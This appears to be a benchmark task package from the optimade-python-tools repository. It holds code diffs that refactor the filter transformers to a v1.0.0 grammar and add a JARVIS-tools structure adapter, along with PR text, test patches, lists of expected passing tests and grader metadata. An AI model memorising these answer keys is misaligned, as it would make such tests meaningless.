HAS ALL "Al" : >0.3333, <0.3334' # -> error - - f = "list1:list2 HAS ALL < 3 : > 4, < 2 : > 5 : > 4, < 2 : > 5" # valid but wrong - f = "ghf.flk<gh" # valid but wrong - - # f = '' - - tree = p.parse(f) - print(tree) - print(tree.pretty()) - - t.transform(tree) diff --git a/optimade/filtertransformers/django.py b/optimade/filtertransformers/django.py index 3a1daf73..2e101c3a 100644 --- a/optimade/filtertransformers/django.py +++ b/optimade/filtertransformers/django.py @@ -1,3 +1,11 @@ +import warnings + +warnings.warn( + "Django functionality is deprecated and will be removed in later versions (unless support is requested).", + DeprecationWarning, + stacklevel=2, +) + import operator from optimade.filterparser import LarkParser from lark import Tree @@ -5,6 +13,9 @@ from lark.lexer import Token from django.db.models import Q +__all__ = ("DjangoTransformer",) + + class DjangoQueryError(Exception): pass @@ -19,7 +30,16 @@ django_db_keys = { } -class Lark2Django: +class DjangoTransformer: + """Filter transformer for implementations using Django. + + !!! warning "Warning" + This transformer is deprecated as it only supports + the 0.9.7 grammar version, and works different to other + filter transformers in this package. + + """ + def __init__(self): self.opers = { "=": self.eq, diff --git a/optimade/filtertransformers/elasticsearch.py b/optimade/filtertransformers/elasticsearch.py index f788b5ba..6dd900ef 100644 --- a/optimade/filtertransformers/elasticsearch.py +++ b/optimade/filtertransformers/elasticsearch.py @@ -4,6 +4,11 @@ import lark from elasticsearch_dsl import Q, Text, Keyword, Integer, Field from optimade.models import CHEMICAL_SYMBOLS, ATOMIC_NUMBERS +__all__ = ( + "ElasticTransformer", + "Transformer", +) + _cmp_operators = {">": "gt", ">=": "gte", "<": "lt", "<=": "lte"} _rev_cmp_operators = {">": "<", ">=": "<=", "<": ">", "<=": "=>"} @@ -65,8 +70,8 @@ class Quantity: return self.name -class Transformer(lark.Transformer): - """Transformer that transforms ``v0.10.0`` grammer parse trees into queries. +class ElasticTransformer(lark.Transformer): + """Transformer that transforms ``v0.10.0`` grammar parse trees into queries. Uses elasticsearch_dsl and will produce a `Q` instance. """ @@ -286,3 +291,7 @@ class Transformer(lark.Transformer): def string_literal(self, args): return args[0].strip('"') + + +# added for potential backward compatibility +Transformer = ElasticTransformer diff --git a/optimade/filtertransformers/json.py b/optimade/filtertransformers/json.py deleted file mode 100644 index 5427be2d..00000000 --- a/optimade/filtertransformers/json.py +++ /dev/null @@ -1,37 +0,0 @@ -from lark import Transformer -from lark.lexer import Token - - -class JSONTransformer(Transformer): # pragma: no cover - def __init__(self, compact=False): - self.compact = compact - super().__init__() - - def __default__(self, data, children, meta): - items = [] - for c in children: - if isinstance(c, Token): - token_repr = { - "@module": "lark.lexer", - "@class": "Token", - "type_": c.type, - "value": c.value, - } - if self.compact: - del token_repr["@module"] - del token_repr["@class"] - items.append(token_repr) - elif isinstance(c, dict): - items.append(c) - else: - raise ValueError(f"Unknown type {type(c)} for tree child {c}") - tree_repr = { - "@module": "lark", - "@class": "Tree", - "data": data, - "children": items, - } - if self.compact: - del tree_repr["@module"] - del tree_repr["@class"] - return tree_repr diff --git a/optimade/filtertransformers/mongo.py b/optimade/filtertransformers/mongo.py index 3500f575..9b09844a 100755 --- a/optimade/filtertransformers/mongo.py +++ b/optimade/filtertransformers/mongo.py @@ -1,11 +1,18 @@ import copy -from lark import Transformer, v_args, Token -from optimade.server.mappers import BaseResourceMapper +from lark import v_args, Token +from optimade.filtertransformers.base_transformer import BaseTransformer from optimade.server.exceptions import BadRequest +__all__ = ("MongoTransformer",) -class MongoTransformer(Transformer): - """Support for grammar v0.10.1""" + +class MongoTransformer(BaseTransformer): + """Transformer for MongoDB backend. Parses lark tree into + a dictionary to be passed to pymongo/mongomock. Uses + post-processing functions to handle aliasing and some + specific edge-cases for MongoDB. + + """ operator_map = { "<": "$lt", @@ -24,14 +31,6 @@ class MongoTransformer(Transformer): "$eq": "$eq", } - def __init__(self, mapper: BaseResourceMapper = None): - """Initialise the object, optionally loading in a - resource mapper for use when post-processing. - - """ - self.mapper = mapper - super().__init__() - def postprocess(self, query): """ Used to post-process the final parsed query. """ if self.mapper: @@ -46,41 +45,6 @@ class MongoTransformer(Transformer): return query - def transform(self, tree): - return self.postprocess(super().transform(tree)) - - def filter(self, arg): - # filter: expression* - return arg[0] if arg else None - - @v_args(inline=True) - def constant(self, value): - # constant: string | number - # Note: Do nothing! - return value - - @v_args(inline=True) - def value(self, value): - # value: string | number | property - # Note: Do nothing! - return value - - @v_args(inline=True) - def non_string_value(self, value): - """ non_string_value: number | property """ - # Note: Do nothing! - return value - - @v_args(inline=True) - def not_implemented_string(self, value): - """not_implemented_string: value - - Raise NotImplementedError. - For further information, see Materials-Consortia/OPTIMADE issue 157: - https://github.com/Materials-Consortia/OPTIMADE/issues/157 - """ - raise NotImplementedError("Comparing strings is not yet implemented.") - def value_list(self, arg): # value_list: [ OPERATOR ] value ( "," [ OPERATOR ] value )* # NOTE: no support for optional OPERATOR, yet, so this takes the @@ -115,12 +79,6 @@ class MongoTransformer(Transformer): # expression_phrase: [ NOT ] ( comparison | "(" expression ")" ) return self._recursive_expression_phrase(arg) - @v_args(inline=True) - def comparison(self, value): - # comparison: constant_first_comparison | property_first_comparison - # Note: Do nothing! - return value - def property_first_comparison(self, arg): # property_first_comparison: property ( value_op_rhs | known_op_rhs | fuzzy_string_op_rhs | set_op_rhs | # set_zip_op_rhs | length_op_rhs ) @@ -204,34 +162,6 @@ class MongoTransformer(Transformer): # property_zip_addon: ":" property (":" property)* raise NotImplementedError - def property(self, arg): - # property: IDENTIFIER ( "." IDENTIFIER )* - return ".".join(arg) - - @v_args(inline=True) - def string(self, string): - # string: ESCAPED_STRING - return string.strip('"') - - @v_args(inline=True) - def signed_int(self, number): - # signed_int : SIGNED_INT - return int(number) - - @v_args(inline=True) - def number(self, number): - # number: SIGNED_INT | SIGNED_FLOAT - if number.type == "SIGNED_INT": - type_ = int - elif number.type == "SIGNED_FLOAT": - type_ = float - return type_(number) - - def __default__(self, data, children, meta): - raise NotImplementedError( - f"Calling __default__, i.e., unknown grammar concept. data: {data}, children: {children}, meta: {meta}" - ) - def _recursive_expression_phrase(self, arg): """Helper function for parsing `expression_phrase`. Recursively sorts out the correct precedence for `$and`, `$or` and `$nor`. diff --git a/optimade/grammar/v0.10.1.lark b/optimade/grammar/v0.10.1.lark deleted file mode 100644 index 573b1d6a..00000000 --- a/optimade/grammar/v0.10.1.lark +++ /dev/null @@ -1,111 +0,0 @@ -// optimade v0.10.1 grammar spec in lark grammar format - -?start: filter -filter: expression* - -// Values -constant: string | number -// Note: support for property in value is OPTIONAL -value: string | number | property - -// Note: not_implemented_string is only here to help Transformers -non_string_value: number | property -not_implemented_string: string - -// Note: support for OPERATOR in value_list is OPTIONAL -value_list: [ OPERATOR ] value ( "," [ OPERATOR ] value )* -// Note: support for OPERATOR in value_zip is OPTIONAL -value_zip: [ OPERATOR ] value ":" [ OPERATOR ] value (":" [ OPERATOR ] value)* -value_zip_list: value_zip ( "," value_zip )* - -// Expressions -expression: expression_clause ( _OR expression_clause )* -expression_clause: expression_phrase ( _AND expression_phrase )* -expression_phrase: [ NOT ] ( comparison | "(" expression ")" ) -// Note: support for constant_first_comparison is OPTIONAL -comparison: constant_first_comparison | property_first_comparison - -// Note: support for set_zip_op_rhs in comparison is OPTIONAL -property_first_comparison: property ( value_op_rhs - | known_op_rhs - | fuzzy_string_op_rhs - | set_op_rhs - | set_zip_op_rhs - | length_op_rhs ) - -constant_first_comparison: constant OPERATOR ( non_string_value | not_implemented_string ) - -value_op_rhs: OPERATOR value -known_op_rhs: IS ( KNOWN | UNKNOWN ) -fuzzy_string_op_rhs: CONTAINS value - | STARTS [ WITH ] value - | ENDS [ WITH ] value -// Note: support for ONLY in set_op_rhs is OPTIONAL -// Note: support for [ OPERATOR ] in set_op_rhs is OPTIONAL -// set_op_rhs: HAS [ ALL | ANY | ONLY] value_list -set_op_rhs: HAS ( [ OPERATOR ] value - | ALL value_list - | ANY value_list - | ONLY value_list ) - -// Note: support for [ OPERATOR ] is OPTIONAL -length_op_rhs: LENGTH [ OPERATOR ] signed_int - -set_zip_op_rhs: property_zip_addon HAS ( value_zip | ONLY value_zip_list | ALL value_zip_list | ANY value_zip_list ) -property_zip_addon: ":" property (":" property)* - -// Property syntax -property: IDENTIFIER ( "." IDENTIFIER )* - -// String syntax -string: ESCAPED_STRING - -// Number token syntax -number: SIGNED_INT | SIGNED_FLOAT - -// Custom signed int -signed_int: SIGNED_INT - -// Tokens - -// Boolean relations -_AND: "AND" -_OR: "OR" -NOT: "NOT" - -IS: "IS" -KNOWN: "KNOWN" -UNKNOWN: "UNKNOWN" - -CONTAINS: "CONTAINS" -STARTS: "STARTS" -ENDS: "ENDS" -WITH: "WITH" - -LENGTH: "LENGTH" -HAS: "HAS" -ALL: "ALL" -ONLY: "ONLY" -ANY: "ANY" - -// Comparison OPERATORs -OPERATOR: ( "<" ["="] | ">" ["="] | ["!"] "=" ) - -IDENTIFIER: ( "_" | LCASE_LETTER ) ( "_" | LCASE_LETTER | DIGIT )* -LCASE_LETTER: "a".."z" -DIGIT: "0".."9" - -// Strings - -_STRING_INNER: /(.|[\t\f\r\n])*?/ -_STRING_ESC_INNER: _STRING_INNER /(?<!\\)(\\\\)*?/ - -ESCAPED_STRING : "\"" _STRING_ESC_INNER "\"" - - -%import common.SIGNED_INT -%import common.SIGNED_FLOAT - -// White-space -%import common.WS -%ignore WS diff --git a/optimade/grammar/v0.10.1.lark b/optimade/grammar/v0.10.1.lark new file mode 120000 index 00000000..c5582225 --- /dev/null +++ b/optimade/grammar/v0.10.1.lark @@ -0,0 +1,1 @@ +v1.0.0.lark \ No newline at end of file diff --git a/optimade/grammar/v1.0.0.lark b/optimade/grammar/v1.0.0.lark new file mode 100644 index 00000000..974225a6 --- /dev/null +++ b/optimade/grammar/v1.0.0.lark @@ -0,0 +1,111 @@ +// optimade v1.0.0 (also valid for v0.10.1) grammar spec in lark grammar format + +?start: filter +filter: expression* + +// Values +constant: string | number +// Note: support for property in value is OPTIONAL +value: string | number | property + +// Note: not_implemented_string is only here to help Transformers +non_string_value: number | property +not_implemented_string: string + +// Note: support for OPERATOR in value_list is OPTIONAL +value_list: [ OPERATOR ] value ( "," [ OPERATOR ] value )* +// Note: support for OPERATOR in value_zip is OPTIONAL +value_zip: [ OPERATOR ] value ":" [ OPERATOR ] value (":" [ OPERATOR ] value)* +value_zip_list: value_zip ( "," value_zip )* + +// Expressions +expression: expression_clause ( _OR expression_clause )* +expression_clause: expression_phrase ( _AND expression_phrase )* +expression_phrase: [ NOT ] ( comparison | "(" expression ")" ) +// Note: support for constant_first_comparison is OPTIONAL +comparison: constant_first_comparison | property_first_comparison + +// Note: support for set_zip_op_rhs in comparison is OPTIONAL +property_first_comparison: property ( value_op_rhs + | known_op_rhs + | fuzzy_string_op_rhs + | set_op_rhs + | set_zip_op_rhs + | length_op_rhs ) + +constant_first_comparison: constant OPERATOR ( non_string_value | not_implemented_string ) + +value_op_rhs: OPERATOR value +known_op_rhs: IS ( KNOWN | UNKNOWN ) +fuzzy_string_op_rhs: CONTAINS value + | STARTS [ WITH ] value + | ENDS [ WITH ] value +// Note: support for ONLY in set_op_rhs is OPTIONAL +// Note: support for [ OPERATOR ] in set_op_rhs is OPTIONAL +// set_op_rhs: HAS [ ALL | ANY | ONLY] value_list +set_op_rhs: HAS ( [ OPERATOR ] value + | ALL value_list + | ANY value_list + | ONLY value_list ) + +// Note: support for [ OPERATOR ] is OPTIONAL +length_op_rhs: LENGTH [ OPERATOR ] signed_int + +set_zip_op_rhs: property_zip_addon HAS ( value_zip | ONLY value_zip_list | ALL value_zip_list | ANY value_zip_list ) +property_zip_addon: ":" property (":" property)* + +// Property syntax +property: IDENTIFIER ( "." IDENTIFIER )* + +// String syntax +string: ESCAPED_STRING + +// Number token syntax +number: SIGNED_INT | SIGNED_FLOAT + +// Custom signed int +signed_int: SIGNED_INT + +// Tokens + +// Boolean relations +_AND: "AND" +_OR: "OR" +NOT: "NOT" + +IS: "IS" +KNOWN: "KNOWN" +UNKNOWN: "UNKNOWN" + +CONTAINS: "CONTAINS" +STARTS: "STARTS" +ENDS: "ENDS" +WITH: "WITH" + +LENGTH: "LENGTH" +HAS: "HAS" +ALL: "ALL" +ONLY: "ONLY" +ANY: "ANY" + +// Comparison OPERATORs +OPERATOR: ( "<" ["="] | ">" ["="] | ["!"] "=" ) + +IDENTIFIER: ( "_" | LCASE_LETTER ) ( "_" | LCASE_LETTER | DIGIT )* +LCASE_LETTER: "a".."z" +DIGIT: "0".."9" + +// Strings + +_STRING_INNER: /(.|[\t\f\r\n])*?/ +_STRING_ESC_INNER: _STRING_INNER /(?<!\\)(\\\\)*?/ + +ESCAPED_STRING : "\"" _STRING_ESC_INNER "\"" + + +%import common.SIGNED_INT +%import common.SIGNED_FLOAT + +// White-space +%import common.WS +%ignore WS diff --git a/optimade/server/entry_collections/mongo.py b/optimade/server/entry_collections/mongo.py index ea9705be..2e68a41d 100644 --- a/optimade/server/entry_collections/mongo.py +++ b/optimade/server/entry_collections/mongo.py @@ -65,9 +65,7 @@ class MongoCollection(EntryCollection): MongoTransformer(mapper=resource_mapper), ) - self.parser = LarkParser( - version=(0, 10, 1), variant="default" - ) # The MongoTransformer only supports v0.10.1 as the latest grammar + self.parser = LarkParser(version=(1, 0, 0), variant="default") # check aliases do not clash with mongo operators self._check_aliases(self.resource_mapper.all_aliases()) diff --git a/optimade/validator/__init__.py b/optimade/validator/__init__.py index a6df19a3..c14ae58d 100644 --- a/optimade/validator/__init__.py +++ b/optimade/validator/__init__.py @@ -5,7 +5,7 @@ from .validator import ImplementationValidator __all__ = ["ImplementationValidator", "validate"] -def validate(): +def validate(): # pragma: no cover import argparse import sys import os
Create template filtertransformer BaseTransformer Here's a first pass at a `BaseTransformer`. I think we need to discuss what to do with the Django, JSON and TransformerSkeleton and elasticsearch transformers, plus all the grammar variants... I haven't really gotten my head around how lark interacts with these magic-word methods, and how we currently have different method names between al the transformers. For now, I've made most of the `BaseTransformer` methods abstract, apart from those that do very simple things (i.e. take in a value and return value). - [x] Add deprecation warning for `Lark2Django`/`DjangoTransformer`, which is working from 0.9.7 grammar and will be tricky to adapt - [x] Remove `JSONTransformer` and `DebugTransformer` (and updated docs) - [x] Created abstract `BaseTransformer` and pulled mongo functionality out - [x] Made file for `v1.0.0` grammar that links to `v0.10.1`
**Title** Align filter parsing and transformation to the v1.0.0 grammar and consolidate transformer architecture **Problem** The package still referenced the historic `Parser` and outdated transformer classes (JSON, Debug, Django), causing version mismatches and duplicated logic across back‑ends. Documentation and server code also pointed to the old grammar version, leading to confusion for users and maintainers. **Root Cause** Legacy transformer implementations were never unified under a common base and remained tied to the previous grammar (v0.9.7/v0.10.1). **Fix / Expected Behavior** - Update examples and documentation to use the new `LarkParser` with the v1.0.0 grammar. - Remove the obsolete `JSONTransformer` and `DebugTransformer` modules and their docs. - Emit a deprecation warning for the Django transformer and clarify its limited future support. - Introduce an abstract `BaseTransformer` that centralises shared, backend‑agnostic parsing logic. - Refactor the Mongo transformer to inherit from `BaseTransformer` and rely on the unified implementation. - Adjust the server’s Mongo collection to instantiate the parser at version 1.0.0. - Expose the transformer package’s public API via an `__init__` stub. **Risk & Validation** - Run the full test suite, especially transformer‑related tests, to confirm existing Mongo queries produce identical results. - Verify that documentation builds without broken links or outdated code snippets. - Ensure the deprecation warning for Django is raised correctly without affecting existing functionality.
287
Materials-Consortia/optimade-python-tools
diff --git a/tests/filterparser/test_filterparser.py b/tests/filterparser/test_filterparser.py index f4ef123b..d4a40374 100644 --- a/tests/filterparser/test_filterparser.py +++ b/tests/filterparser/test_filterparser.py @@ -40,8 +40,8 @@ class TestParserV0_9_5: assert repr(self.parser) is not None -class TestParserV0_10_1: - version = (0, 10, 1) +class TestParserV1_0_0: + version = (1, 0, 0) variant = "default" @pytest.fixture(autouse=True) diff --git a/tests/filtertransformers/test_django.py b/tests/filtertransformers/test_django.py index 55e90b92..8a969b38 100644 --- a/tests/filtertransformers/test_django.py +++ b/tests/filtertransformers/test_django.py @@ -16,12 +16,12 @@ test_data = [ ] -class TestLark2Django: +class TestDjangoTransformer: @pytest.fixture(autouse=True) def set_up_class(self): - from optimade.filtertransformers.django import Lark2Django + from optimade.filtertransformers.django import DjangoTransformer - self.Transformer = Lark2Django() + self.Transformer = DjangoTransformer() def test_query_conversion(self): for raw_q, dj_q in test_data: diff --git a/tests/filtertransformers/test_mongo.py b/tests/filtertransformers/test_mongo.py index c9462baf..6bcc9892 100644 --- a/tests/filtertransformers/test_mongo.py +++ b/tests/filtertransformers/test_mongo.py @@ -7,7 +7,7 @@ from optimade.server.exceptions import BadRequest class TestMongoTransformer: - version = (0, 10, 1) + version = (1, 0, 0) variant = "default" @pytest.fixture(autouse=True)
[ "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_empty", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_property_names", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_string_values", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_number_values", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_operators", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_id", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_string_operations", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_list_properties", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_properties", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_precedence", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_special_cases", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_parser_version", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_repr", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_empty", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_property_names", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_string_values", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_number_values", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_simple_comparisons", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_id", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_operators", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_filtering_on_relationships", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_not_implemented", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_list_length_aliases", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_unaliased_length_operator", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_aliased_length_operator", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_aliases", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_list_properties", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_known_properties", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_precedence", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_special_cases" ]
[ "tests/filterparser/test_filterparser.py::TestParserV0_9_5::test_inputs", "tests/filterparser/test_filterparser.py::TestParserV0_9_5::test_parser_version", "tests/filterparser/test_filterparser.py::TestParserV0_9_5::test_repr" ]
Method: DjangoTransformer.__init__(self) Location: optimade.filtertransformers.django.DjangoTransformer.__init__ Inputs: None (no parameters) Outputs: An instance of DjangoTransformer (e.g. self.Transformer = DjangoTransformer()) Description: Constructs the (deprecated) Django filter transformer that converts a parsed Lark filter tree into a Django Q object. No arguments are required. Function: DjangoTransformer() Location: optimade.filtertransformers.django.DjangoTransformer (class callable) Inputs: None Outputs: New DjangoTransformer object Description: Callable alias for the class constructor; creates a transformer instance used in tests to convert filter expressions to Django queries.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/filterparser/test_filterparser.py tests/filtertransformers/test_django.py tests/filtertransformers/test_mongo.py" }
{ "num_modified_files": 10, "num_modified_lines": 384, "pr_author": "ml-evs", "pr_labels": [ "blocking: For issues/PRs that are blocking other PRs.", "priority/medium: Issue or PR with a consensus of medium priority", "transformers: Related to all filter transformers" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.93, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests creation of a generic BaseTransformer class and related refactoring (renaming, deprecation warnings, grammar version bump). The test patch updates version numbers and class names to match the new implementation, aligning with the described changes. No test expectations conflict with the problem statement and no hidden external dependencies are evident. Therefore the task is well specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
e1cac1e0408ca236ae1d37a9f184eaed170e8f54
2020-06-10 07:11:30
CasperWA: > Yes, I think so too. But we do not have the vacancy in the Specie object. We mention in the 'test_special_species' function. We define a separate Vacancy object. So the `chemical_symbols` is a list of chemical elements (case sensitive), but can also include `"X"` as an unknown element, which isn't a vacancy, and then of course also `"vacancy"`, which will represent a vacancy. If `jarvis.core.atoms.Atoms` cannot handle these (`"X"`), you should try to handle that before returning the `Atoms` object. For `"vacancy"` you're already doing this, since you're checking for `"disorder"` and raising if found in `structure_features`, so that's excellent! :) However, a structure may also have a single `species` with `chemical_symbols = ["X"]`, which isn't caught by this check. Would this break jarvis' Atoms? Actually, we are not properly testing for this at the moment! So I think I'll create a separate PR adding this test. For this PR, I consider it good-enough at this time, but the adapter may have to be updated for the separate PR. If you want to include the "fix" already in this PR that's great! :) Otherwise I would consider it fine to add it in the separate PR, including the other fixes that would need to be done (for, e.g., ASE). CasperWA: @knc6 I've been looking a bit into the code of jarvis, and it seems the `Specie` class you're wrapping the entries of `Atoms.elements` in takes a `str` as initializer. I would suggest to then initialize your `Atoms` instance in the adapter, providing `elements` with a generated list of OPTIMADE species' `name` key, i.e.: ```python3 Atoms( elements=[specie.name for specie in attributes.species], # ... other instantiating attributes ... ) ``` Do you think this makes sense? Instead of your `Specie` class having to initalize with `symbol` being a Python dictionary instead of a string (which would currently be the case)? CasperWA: @knc6 I have updated your test here to take into account structures with special non-disordered species (i.e., updating it according to the newly added tests in #305. I hope it's all right? If not, please make the appropriate changes on top. If you're having trouble getting a local version matching the one here on github, you can first do `git fetch --all -p` followed by (as long as you have checked out this branch locally) `git reset --hard knc6/master`. This will reset your local version of the branch to the one on GitHub disregarding any differences. knc6: @CasperWA I changed the jarvis.py in the adapters/structures accordingly. Your changes makes sense to me. Atoms constructor should be able to take 'X' or any other character. It will only fail, if we ask for some chemical properties such as Specie('X').atomic_mass.
materials-consortia__optimade-python-tools-297
diff --git a/optimade/adapters/structures/__init__.py b/optimade/adapters/structures/__init__.py index 048800be..6922615c 100644 --- a/optimade/adapters/structures/__init__.py +++ b/optimade/adapters/structures/__init__.py @@ -6,6 +6,7 @@ from .ase import get_ase_atoms from .cif import get_cif from .proteindatabank import get_pdb, get_pdbx_mmcif from .pymatgen import get_pymatgen +from .jarvis import get_jarvis_atoms __all__ = ("Structure",) @@ -24,4 +25,5 @@ class Structure(EntryAdapter): "pdb": get_pdb, "pdbx_mmcif": get_pdbx_mmcif, "pymatgen": get_pymatgen, + "jarvis": get_jarvis_atoms, } diff --git a/optimade/adapters/structures/jarvis.py b/optimade/adapters/structures/jarvis.py new file mode 100644 index 00000000..c1520001 --- /dev/null +++ b/optimade/adapters/structures/jarvis.py @@ -0,0 +1,43 @@ +from warnings import warn +from optimade.models import StructureResource as OptimadeStructure +from optimade.adapters.exceptions import ConversionError +from optimade.adapters.structures.utils import pad_positions + +try: + from jarvis.core.atoms import Atoms +except (ImportError, ModuleNotFoundError): + Atoms = None + JARVIS_NOT_FOUND = "jarvis-tools package not found, cannot convert structure to a JARVIS Atoms. Visit https://github.com/usnistgov/jarvis" + + +__all__ = ("get_jarvis_atoms",) + + +def get_jarvis_atoms(optimade_structure: OptimadeStructure) -> Atoms: + """ Get jarvis Atoms from OPTIMADE structure + + NOTE: Cannot handle partial occupancies + + :param optimade_structure: OPTIMADE structure + :return: jarvis.core.Atoms + """ + if globals().get("Atoms", None) is None: + warn(JARVIS_NOT_FOUND) + return None + + attributes = optimade_structure.attributes + + # Cannot handle partial occupancies + if "disorder" in attributes.structure_features: + raise ConversionError( + "jarvis-tools cannot handle structures with partial occupancies." + ) + + cartesian_site_positions, _ = pad_positions(attributes.cartesian_site_positions) + + return Atoms( + lattice_mat=attributes.lattice_vectors, + elements=[specie.name for specie in attributes.species], + coords=cartesian_site_positions, + cartesian=True, + ) diff --git a/setup.py b/setup.py index 5c663277..96f70e00 100644 --- a/setup.py +++ b/setup.py @@ -16,6 +16,7 @@ ase_deps = ["ase~=3.19"] cif_deps = ["numpy~=1.18"] pdb_deps = cif_deps pymatgen_deps = ["pymatgen~=2020.3"] +jarvis_deps = ["jarvis-tools~=2020.6"] client_deps = cif_deps # General @@ -27,7 +28,15 @@ testing_deps = [ "jsondiff", ] + server_deps dev_deps = ["pylint", "black", "pre-commit", "invoke"] + testing_deps + client_deps -all_deps = dev_deps + django_deps + elastic_deps + aiida_deps + ase_deps + pymatgen_deps +all_deps = ( + dev_deps + + django_deps + + elastic_deps + + aiida_deps + + ase_deps + + pymatgen_deps + + jarvis_deps +) setup( name="optimade", @@ -76,6 +85,7 @@ setup( "cif": cif_deps, "pdb": pdb_deps, "pymatgen": pymatgen_deps, + "jarvis": jarvis_deps, }, entry_points={ "console_scripts": ["optimade_validator=optimade.validator:validate"]
Adding jarvis-tools structures
**Title** Add JARVIS‑tools support to the structure adapter **Problem** The library could convert OPTIMADE structures only to ASE, CIF, PDB, and Pymatgen representations. Users needing JARVIS‑tools atoms had no way to obtain them, limiting interoperability with workflows that rely on that package. **Root Cause** The JARVIS‑tools backend was never integrated into the structure‑adapter registry and its optional dependency was not declared. **Fix / Expected Behavior** - Introduce a conversion routine that builds a JARVIS‑tools `Atoms` object from an OPTIMADE structure. - Register the new routine alongside the existing backends so it can be selected via the same interface. - Declare the `jarvis-tools` package as an optional extra and include it in the aggregate dependencies. - Emit a clear warning and return `None` when the JARVIS‑tools library is unavailable. - Raise a conversion error for structures with partial occupancies, which JARVIS‑tools cannot represent. **Risk & Validation** - Adding a new optional dependency may affect environments where JARVIS‑tools is not installed; the warning path mitigates crashes. - Verify that the new converter produces correct `Atoms` objects for standard structures and that the warning is triggered when the library is absent. - Ensure existing conversion pathways remain unchanged and all tests pass after the dependency update.
297
Materials-Consortia/optimade-python-tools
diff --git a/tests/adapters/structures/test_jarvis.py b/tests/adapters/structures/test_jarvis.py new file mode 100644 index 00000000..929ba425 --- /dev/null +++ b/tests/adapters/structures/test_jarvis.py @@ -0,0 +1,53 @@ +# pylint: disable=import-error +import pytest + +from .utils import get_min_ver + +min_ver = get_min_ver("jarvis-tools") +jarvis = pytest.importorskip( + "jarvis", + minversion=min_ver, + reason=f"jarvis-tools must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from jarvis.core.atoms import Atoms +from optimade.adapters import Structure +from optimade.adapters.exceptions import ConversionError +from optimade.adapters.structures.jarvis import get_jarvis_atoms + + +def test_successful_conversion(RAW_STRUCTURES): + """Make sure its possible to convert""" + for structure in RAW_STRUCTURES: + assert isinstance(get_jarvis_atoms(Structure(structure)), Atoms) + + +def test_null_positions(null_position_structure): + """Make sure null positions are handled""" + assert isinstance(get_jarvis_atoms(null_position_structure), Atoms) + + +def test_null_lattice_vectors(null_lattice_vector_structure): + """Make sure null lattice vectors are handled""" + assert isinstance(get_jarvis_atoms(null_lattice_vector_structure), Atoms) + + +def test_special_species(SPECIAL_SPECIES_STRUCTURES): + """Make sure vacancies and non-chemical symbols ("X") are handled""" + for special_structure in SPECIAL_SPECIES_STRUCTURES: + structure = Structure(special_structure) + + # Since all the special species structure only have a single species, this works fine. + if len(structure.species[0].chemical_symbols) > 1: + # If the structure is disordered (has partial occupancies of any kind), + # jarvis-tools cannot convert the structure + with pytest.raises( + ConversionError, + match="jarvis-tools cannot handle structures with partial occupancies", + ): + get_jarvis_atoms(structure) + else: + # No partial occupancies, just special/non-standard species. + # jarvis-tools should convert these structure fine enough. + assert isinstance(get_jarvis_atoms(structure), Atoms) diff --git a/tests/adapters/structures/test_structures.py b/tests/adapters/structures/test_structures.py index 3cea1eab..1e950c9f 100644 --- a/tests/adapters/structures/test_structures.py +++ b/tests/adapters/structures/test_structures.py @@ -8,6 +8,7 @@ try: import ase # noqa: F401 import numpy # noqa: F401 import pymatgen # noqa: F401 + import jarvis # noqa: F401 except ImportError: all_modules_found = False else: @@ -107,10 +108,11 @@ class TestStructure: "ase": 